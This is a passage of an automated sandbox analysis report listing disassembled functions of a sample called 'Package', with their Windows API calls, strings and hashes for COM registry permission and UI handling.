Opcode Fuzzy Hash: 8f64c9acc2bbb23b9e85ff0fd13a4d20f488d73efd6d9318c143c19461cffc5d
Instruction Fuzzy Hash: 2D9002A86917084B46005BB05C0990525905A59616B424460A086D5168EB5080C86531

Function 00D390DA Relevance: 1.5, APIs: 1, Instructions: 3clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(?), ref: 00D390DD

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ClipboardOpen
String ID:
API String ID: 2793039342-0
Opcode ID: 30c57c19e72b51e41de015a71ab190c52471ff5b463b2643a636d128af2300e7
Instruction ID: 9ff702837fedf187627b4fd00a585219f749cffe3e140514a60d9e01dc20d390
Opcode Fuzzy Hash: 30c57c19e72b51e41de015a71ab190c52471ff5b463b2643a636d128af2300e7
Instruction Fuzzy Hash: 9C9002754101408BCE015F10ED085043B31FB46306320019490558D53187325463DA50

Function 6E2F86D4 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6E2F86D4

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 906b5d4bea00f885895d482c134a2008858e9b61eeace53f9a1a248ed0ac692b
Instruction ID: 173aa4e27b98eee763d54164e97381008e3fbeab1f989e8de43e1c5979854420
Opcode Fuzzy Hash: 906b5d4bea00f885895d482c134a2008858e9b61eeace53f9a1a248ed0ac692b
Instruction Fuzzy Hash: 92A00270551501CB6B445F35990930A359975465E1715C15D9406C6154E6644550DF25

Function 00D3C0BC Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 318windowregistryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D3C0C6
#540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
RegOpenKeyExW.ADVAPI32 ref: 00D3C112
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
RegCloseKey.ADVAPI32(?), ref: 00D3C151
#800.MFC42U ref: 00D3C15F
malloc.MSVCRT ref: 00D3C174
RegCloseKey.ADVAPI32(?), ref: 00D3C18D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C1B4
RegCloseKey.ADVAPI32(?), ref: 00D3C1C2
free.MSVCRT ref: 00D3C1CD
GetSecurityDescriptorDacl.ADVAPI32(00000000,?,?,?), ref: 00D3C1EC
GetLastError.KERNEL32 ref: 00D3C1F6
#2810.MFC42U(?,Everyone), ref: 00D3C21C
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D3C250
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00D3C283
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D3C29A
SendMessageW.USER32(?,0000104C,00000000,?), ref: 00D3C2CA
free.MSVCRT ref: 00D3C2D1
GetAce.ADVAPI32(00000000,00000000,?), ref: 00D3C2EB
LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00D3C350
#2810.MFC42U(?,%s\%s,?,?), ref: 00D3C374
#2810.MFC42U(?,?? Unknown Account ??), ref: 00D3C38A
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D3C3BE
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00D3C3F5
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D3C40C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00D3C47D
#2810.MFC42U(?,%s\%s,?,?), ref: 00D3C4A1
#2810.MFC42U(?,?? Unknown Account ??), ref: 00D3C4B7
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D3C4EB
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00D3C522
SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D3C539
SendMessageW.USER32(?,0000104C,00000000,?), ref: 00D3C569
#3993.MFC42U(00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 00D3C57F
GetAce.ADVAPI32(00000000,00000001,?,00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 00D3C593
GetLastError.KERNEL32 ref: 00D3C5AC

Strings

?? Unknown ACE ??, xrefs: 00D3C575
%s\%s, xrefs: 00D3C36E, 00D3C49B
Everyone, xrefs: 00D3C216
Yes, xrefs: 00D3C2C0, 00D3C42C
?? Unknown Account ??, xrefs: 00D3C384, 00D3C4B1

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#2810$Close$AccountErrorLastLookupQueryValuefree$#3993#540#800DaclDescriptorH_prolog3_OpenSecuritymalloc
String ID: %s\%s$?? Unknown ACE ??$?? Unknown Account ??$Everyone$Yes
API String ID: 47226287-2762826609
Opcode ID: 4bbd6f3e4d35d1b85f5e406380de5e6fba5fbf943d98fe2c637420e40e73118f
Instruction ID: 8b5253bffea500fea40ff4ccc2e2a2221228ab222a4a655caee95b80cb0b6a88
Opcode Fuzzy Hash: 4bbd6f3e4d35d1b85f5e406380de5e6fba5fbf943d98fe2c637420e40e73118f
Instruction Fuzzy Hash: 32D1EDF590062C9FDB208F50DC84AEAB7BCEB49314F5045E9E649A2291DB709EC49F74

Function 00D31870 Relevance: 66.8, APIs: 35, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00D31877
#540.MFC42U(00000058,00D2B66A), ref: 00D31884
#540.MFC42U(00000058,00D2B66A), ref: 00D31891
#540.MFC42U(00000058,00D2B66A), ref: 00D3189F
#4155.MFC42U(00000004,00000058,00D2B66A), ref: 00D318AD
#4155.MFC42U(00000005,00000004,00000058,00D2B66A), ref: 00D318B7
#3517.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0,00000005), ref: 00D318DE
#858.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0), ref: 00D318EB
#800.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0), ref: 00D318F7
#2910.MFC42U(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31910

Part of subcall function 00D3DB5F: isspace.MSVCRT ref: 00D3DB7C

Part of subcall function 00D3DB5F: isxdigit.MSVCRT ref: 00D3DBF6
Part of subcall function 00D3DB5F: isspace.MSVCRT ref: 00D3DC2E
Part of subcall function 00D3DB5F: isspace.MSVCRT ref: 00D3DC49

Part of subcall function 00D3DB5F: isdigit.MSVCRT ref: 00D3DBCD
Part of subcall function 00D3DB5F: isdigit.MSVCRT ref: 00D3DC1A

Part of subcall function 00D3DB5F: toupper.MSVCRT ref: 00D3DBE3

#5906.MFC42U(00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A67
#6205.MFC42U(?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A80
#6205.MFC42U(?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A92
#6191.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A9D
#800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31AA7
#800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31AAF
#800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31AB7
#1258.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0), ref: 00D31B1E
__EH_prolog3_GS.LIBCMT ref: 00D31B2B
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B35
#540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B41
#4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00D31B4F
#4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B59
#540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B61
#3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B77
#2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B8C
#2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B99
#3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BA6
#3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BB8
wsprintfW.USER32 ref: 00D31BE8
#5568.MFC42U(000000FF), ref: 00D31BF6
#6399.MFC42U(?,?,?,000000FF), ref: 00D31C09
#800.MFC42U(?,?,?,000000FF), ref: 00D31C11
#800.MFC42U(?,?,?,000000FF), ref: 00D31C19
#800.MFC42U(?,?,?,000000FF), ref: 00D31C21

Strings

,, xrefs: 00D31B70
%d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, xrefs: 00D31BE2
,, xrefs: 00D318C7

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#540$#4155$isspace$#2910#3792#6205isdigit$#1258#2970#3517#3865#5568#5906#6191#6399#858H_prolog3_H_prolog3_catch_isxdigittoupperwsprintf
String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,$,
API String ID: 708604890-3364495680
Opcode ID: 56d4700e46b0d9a5f7e0bc41718dc90916c134c918b001bfe7c748cd5d9eb62f
Instruction ID: 50795ee37bddf4396ce3ba35c9fd08c6d85eff7f73ffa1b310dbf988601caa35
Opcode Fuzzy Hash: 56d4700e46b0d9a5f7e0bc41718dc90916c134c918b001bfe7c748cd5d9eb62f
Instruction Fuzzy Hash: B3A1B471D0020DAACF11EFE0D985ADDFBBAEF18300F54452AE155A7192EB746A4ACF70

Function 00D304B0 Relevance: 57.9, APIs: 25, Strings: 8, Instructions: 191registrywindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D304BA

Part of subcall function 00D3D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00D3D152
Part of subcall function 00D3D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00D3D163
Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D179
Part of subcall function 00D3D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D3D1AA
Part of subcall function 00D3D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00D3D25C
Part of subcall function 00D3D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D270
Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D286

LoadCursorW.USER32(00000000,00007F02), ref: 00D304E6
SetCursor.USER32(00000000), ref: 00D304ED

Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E

#538.MFC42U(new CSecurityDescriptor failed.), ref: 00D30528
#800.MFC42U(?,00000000,MakeSelfRelativeSD failed), ref: 00D30754

Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE45
Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE55
Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE6D

#538.MFC42U(00000000,00000000), ref: 00D30575
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,Interactive,00000001,Administrators,00000001,System,00000001,00000000), ref: 00D305BC
malloc.MSVCRT ref: 00D305C8
#538.MFC42U(00000000), ref: 00D305F5
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00D30610
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00D30659
GetSecurityDescriptorLength.ADVAPI32(?), ref: 00D30666
RegSetValueExW.ADVAPI32(?,LaunchPermission,00000000,00000003,?,00000000), ref: 00D3067C
RegCloseKey.ADVAPI32(?), ref: 00D30688
free.MSVCRT ref: 00D3068F
#2634.MFC42U(00000001), ref: 00D306B9
#2634.MFC42U(00000001,00000001), ref: 00D306C6
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D306D9
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D306E9
#5977.MFC42U ref: 00D306F2
LoadCursorW.USER32(00000000,00007F00), ref: 00D306FD
SetCursor.USER32(00000000), ref: 00D30704

Strings

Administrators, xrefs: 00D30592
CSecurityDescriptor::Initialize failed., xrefs: 00D3056E
System, xrefs: 00D30586
Interactive, xrefs: 00D305A0
LaunchPermission, xrefs: 00D30671
psdSelfRelative malloc failed., xrefs: 00D305EE
new CSecurityDescriptor failed., xrefs: 00D3051D
MakeSelfRelativeSD failed, xrefs: 00D3072A

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
String ID: Administrators$CSecurityDescriptor::Initialize failed.$Interactive$LaunchPermission$MakeSelfRelativeSD failed$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
API String ID: 3894545846-2955734171
Opcode ID: 7374e3f0ceef582e5d2e01eb4d5e69815e5068e14098c8740cf462b003122d1e
Instruction ID: 463dc14cf64f0ab53fd1be057185de0d7c42998f2322ae6e1f3aa36c52989dca
Opcode Fuzzy Hash: 7374e3f0ceef582e5d2e01eb4d5e69815e5068e14098c8740cf462b003122d1e
Instruction Fuzzy Hash: 16619571940218ABDB20BF60EC9AFEE7B79EF55700F0004A8F506AA291CF745A85CF71

Function 00D3B8D5 Relevance: 54.5, APIs: 22, Strings: 9, Instructions: 250registryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D3B8DC
LoadCursorW.USER32(00000000,00007F02), ref: 00D3B8F4
SetCursor.USER32(00000000), ref: 00D3B8FB
RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 00D3B911
LoadCursorW.USER32(00000000,00007F00), ref: 00D3B924
SetCursor.USER32(00000000), ref: 00D3B92B
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3B94C
RegCloseKey.ADVAPI32(?), ref: 00D3BAA4

Strings

Administrators, xrefs: 00D3BA28
CSecurityDescriptor::Initialize failed., xrefs: 00D3B9E3
System, xrefs: 00D3B9FD
DefaultLaunchPermission, xrefs: 00D3BA07
Interactive, xrefs: 00D3BA35
LaunchPermission, xrefs: 00D3BA17
DefaultAccessPermission, xrefs: 00D3BA41
new CSecurityDescriptor failed., xrefs: 00D3B998
AccessPermission, xrefs: 00D3BA51

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Cursor$Load$CloseH_prolog3OpenQueryValue
String ID: AccessPermission$Administrators$CSecurityDescriptor::Initialize failed.$DefaultAccessPermission$DefaultLaunchPermission$Interactive$LaunchPermission$System$new CSecurityDescriptor failed.
API String ID: 2619828013-2246421441
Opcode ID: faf01711d5e1bb4f1478a329f9cd8889d0773d6408a98cefcb1efd77a4b2e2c8
Instruction ID: c25714681bff00d86e19415d18188025e42a0d4cebd4081dc1e26298f29e3324
Opcode Fuzzy Hash: faf01711d5e1bb4f1478a329f9cd8889d0773d6408a98cefcb1efd77a4b2e2c8
Instruction Fuzzy Hash: D4914E75A0021AAFDB119FA0DC89BBEBBB9EF59325F140016FA01E6290DB749D41DF70

Function 00D2FE60 Relevance: 49.3, APIs: 17, Strings: 11, Instructions: 285windowregistrystringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2FE6A
#6330.MFC42U(00000001,00000408), ref: 00D2FE73
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00D2FF2B
SendMessageW.USER32(?,00000148,00000000,?), ref: 00D2FF44
lstrcmpW.KERNEL32(?,None), ref: 00D2FF56
RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00D2FFC4
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D3000B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00D30067
SendMessageW.USER32(?,00000148,00000000,?), ref: 00D30080
lstrcmpW.KERNEL32(?,None), ref: 00D30092
RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00D30111
#4118.MFC42U ref: 00D3011D
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D30135
#540.MFC42U(?,?,00D221A0,DllSurrogate), ref: 00D30192
#3871.MFC42U(?), ref: 00D301A8
RegDeleteKeyW.ADVAPI32(80000000,00000000), ref: 00D301F7
#800.MFC42U(?,TreatAs,?,?), ref: 00D30203

Strings

None, xrefs: 00D2FF4A, 00D30086
InProcHandler32, xrefs: 00D2FF09, 00D2FF68, 00D2FF8C, 00D2FFAB
LocalServer32, xrefs: 00D2FFE4, 00D2FFF2
InProcServer32, xrefs: 00D30024, 00D30045, 00D300A4, 00D300DC, 00D300F8
JavaClass, xrefs: 00D30040
ThreadingModel, xrefs: 00D2FF63, 00D2FF87, 00D3009F, 00D300D7
TreatAs, xrefs: 00D301C2, 00D301DE
msjava.dll, xrefs: 00D3001A
DllSurrogate, xrefs: 00D3015A, 00D30174
LocalService, xrefs: 00D2FEB4, 00D2FED5, 00D2FEE6
ServiceParameters, xrefs: 00D2FED0

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$Delete$lstrcmp$#3871#4118#540#6330#800H_prolog3_
String ID: DllSurrogate$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
API String ID: 3854995924-1653547741
Opcode ID: 7cf4942f69f6fbf3b778d540f73bd670950bff368dfc1049ab376854922176a3
Instruction ID: 5acb0aceb4de047f0036f09ee129548117ec0a5962d29ef5dde8cb1106c7be66
Opcode Fuzzy Hash: 7cf4942f69f6fbf3b778d540f73bd670950bff368dfc1049ab376854922176a3
Instruction Fuzzy Hash: 1B916F31540715AEEB11EF24ED87FB73766EF12708F4404A4BE04AF096D6F1AA498BB1

Function 00D2E1A4 Relevance: 47.4, APIs: 22, Strings: 5, Instructions: 186windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D3D4CD: GetVersionExW.KERNEL32(?), ref: 00D3D4F3

SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E1E5
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E1F9
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E219
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E242
#6211.MFC42U(00000005,?,?,?), ref: 00D2E259
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00D2E268
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E277
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E28E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E2A6
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E2BD
SendMessageW.USER32(?,0000133E,00000000,00000001), ref: 00D2E2DE
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E30F
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E326
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E345
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E35C
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E372
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E389
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E3A6
SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 00D2E3BD
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D2E3D0
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00D2E3EB
RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?), ref: 00D2E3FE

Part of subcall function 00D2E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E482
Part of subcall function 00D2E466: #6211.MFC42U(00000005,?,?,?,?,?,00D2E130,?,?), ref: 00D2E49B
Part of subcall function 00D2E466: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00D2E4AA
Part of subcall function 00D2E466: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E4BE
Part of subcall function 00D2E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E4ED
Part of subcall function 00D2E466: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E504
Part of subcall function 00D2E466: SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D2E528
Part of subcall function 00D2E466: SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D2E53B
Part of subcall function 00D2E466: SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00D2E555
Part of subcall function 00D2E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E569
Part of subcall function 00D2E466: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E578

Strings

Access Permissions, xrefs: 00D2E308
Launch Permissions, xrefs: 00D2E33E
Activation, xrefs: 00D2E36B
Implementation, xrefs: 00D2E39F
Registry, xrefs: 00D2E2CA

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$RedrawWindow$#6211$Version
String ID: Access Permissions$Activation$Implementation$Launch Permissions$Registry
API String ID: 3082685337-2693731033
Opcode ID: 8f9e9a88e0cd45b2bb0fc6ad9ba52d83fecf5bff375fc9954721b9538e42e55d
Instruction ID: 7f4437adbc2ff73d8429ca38dbfbc734d9fc4b72223dd0cb30b40cd8ee771873
Opcode Fuzzy Hash: 8f9e9a88e0cd45b2bb0fc6ad9ba52d83fecf5bff375fc9954721b9538e42e55d
Instruction Fuzzy Hash: 53516034500B14BFEB215F21EC4CEAB7BBDFB92705F410418F56A911A0C7B56941CEB0

Function 00D2C150 Relevance: 47.4, APIs: 22, Strings: 5, Instructions: 176registrywindowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2C15A

Part of subcall function 00D3D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00D3D152
Part of subcall function 00D3D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00D3D163
Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D179
Part of subcall function 00D3D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D3D1AA
Part of subcall function 00D3D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00D3D25C
Part of subcall function 00D3D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D270
Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D286

LoadCursorW.USER32(00000000,00007F02), ref: 00D2C186
SetCursor.USER32(00000000), ref: 00D2C18D

Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E

#538.MFC42U(new CSecurityDescriptor failed.), ref: 00D2C1C8
#800.MFC42U(?,00000008,00000000), ref: 00D2C1E8

Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE45
Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE55
Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE6D

#538.MFC42U(00000000,00000000), ref: 00D2C21A
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,?,00000001,?,System,00000001,00000000), ref: 00D2C266
malloc.MSVCRT ref: 00D2C272
#538.MFC42U(00000000), ref: 00D2C29F
MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00D2C2CE
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00D2C313
GetSecurityDescriptorLength.ADVAPI32(?), ref: 00D2C320
RegSetValueExW.ADVAPI32(?,AccessPermission,00000000,00000003,?,00000000), ref: 00D2C336
RegCloseKey.ADVAPI32(?), ref: 00D2C342
free.MSVCRT ref: 00D2C349
#2634.MFC42U(00000001), ref: 00D2C373
#2634.MFC42U(00000001,00000001), ref: 00D2C380
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C393
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C3A3
#5977.MFC42U ref: 00D2C3AC
LoadCursorW.USER32(00000000,00007F00), ref: 00D2C3B7
SetCursor.USER32(00000000), ref: 00D2C3BE

Strings

CSecurityDescriptor::Initialize failed., xrefs: 00D2C213
System, xrefs: 00D2C22B
psdSelfRelative malloc failed., xrefs: 00D2C298
new CSecurityDescriptor failed., xrefs: 00D2C1BD
AccessPermission, xrefs: 00D2C32B

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
